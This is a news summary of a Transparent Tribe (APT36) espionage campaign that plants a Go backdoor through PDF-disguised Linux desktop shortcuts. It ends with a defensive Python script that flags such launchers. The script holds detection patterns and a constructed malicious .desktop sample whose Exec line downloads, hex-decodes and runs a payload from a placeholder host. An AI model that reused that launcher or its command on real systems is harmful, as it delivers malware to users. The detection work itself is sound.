Particle.news

Transparent Tribe Uses Linux Desktop Shortcuts to Plant Go Backdoor in Ongoing India Espionage

New analyses tie the activity to APT36, detailing booby-trapped desktop shortcuts that install a Go backdoor on Indian government systems.

Overview

  • CYFIRMA, CloudSEK and Hunt.io report an active August campaign that targets BOSS Linux and Windows users in Indian government and defense via spear‑phishing meeting notices.
  • Malicious .desktop files disguised as PDFs execute a shell script that fetches a hex‑encoded payload from securestore[.]cv, decodes it to an ELF binary, and displays a decoy PDF hosted on Google Drive.
  • The deployed Go-based malware contains a hardcoded command‑and‑control server at modgovindia[.]space:4000 and is engineered for stealthy remote control and data exfiltration.
  • Persistence is achieved through autostart entries, cron jobs and systemd abuse; researchers note that the samples are statically linked ELF binaries with anti‑analysis checks.
  • Hunt.io attributes the downstream access to a Transparent Tribe backdoor known as Poseidon, while related activity uses typo‑squatted domains to harvest credentials and Kavach 2FA codes on Pakistan‑hosted infrastructure.
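The masquerading .desktop launcher described above has a recognizable shape: a PDF-looking name or icon, an `Exec` line that runs an inline shell script, and commands that download, hex-decode, execute and then open a decoy. The triage check below is an added example written for this summary, not code from the researchers or the campaign; the indicator patterns and the two sample entries are constructed, and the download URL is a placeholder rather than the reported domain.

```python
import re
from configparser import ConfigParser

# Constructed indicator patterns modelled on the reported tradecraft
# (download, hex-decode to ELF, chmod, run, open a Google Drive decoy).
SUSPICIOUS_EXEC = [
    (r"\b(curl|wget)\b", "downloads content at launch"),
    (r"\bxxd\s+-r\s+-p\b|\bbase64\s+(-d|--decode)\b", "decodes an embedded/fetched payload"),
    (r"\bchmod\s+\+x\b", "marks a fetched file executable"),
    (r"(xdg-open|firefox|google-chrome)\s+\S*(drive\.google\.com|\.pdf)", "opens a decoy document"),
    (r"/etc/systemd|\.config/systemd|crontab|\.config/autostart", "sets up persistence"),
]

def analyze_desktop_entry(text: str) -> dict:
    """Parse a .desktop file and return a verdict plus the reasons behind it."""
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return {"suspicious": False, "reasons": ["not a Desktop Entry"]}
    entry = cp["Desktop Entry"]
    name, exec_line, icon = entry.get("Name", ""), entry.get("Exec", ""), entry.get("Icon", "")
    reasons = []
    # Masquerade: the displayed name or icon claims the launcher is a PDF.
    if re.search(r"\.pdf$", name, re.I) or "pdf" in icon.lower():
        reasons.append("presents itself as a PDF")
    # Exec hands an inline script to a shell instead of launching a program.
    if re.search(r"\b(ba|z|da)?sh\s+-c\b", exec_line):
        reasons.append("Exec runs an inline shell script")
    for pattern, why in SUSPICIOUS_EXEC:
        if re.search(pattern, exec_line, re.I):
            reasons.append(why)
    # A single indicator is common in benign launchers; two or more is the trigger.
    return {"suspicious": len(reasons) >= 2, "reasons": reasons}

# Constructed samples: a normal launcher and one shaped like the reported lure.
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
"""
MALICIOUS = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://example.invalid/p.hex | xxd -r -p > /tmp/.x && chmod +x /tmp/.x && /tmp/.x & xdg-open https://drive.google.com/PLACEHOLDER"
"""
```

Run the function over every `.desktop` file in `~/Desktop`, `~/.local/share/applications` and `~/.config/autostart` to surface launchers worth a closer look.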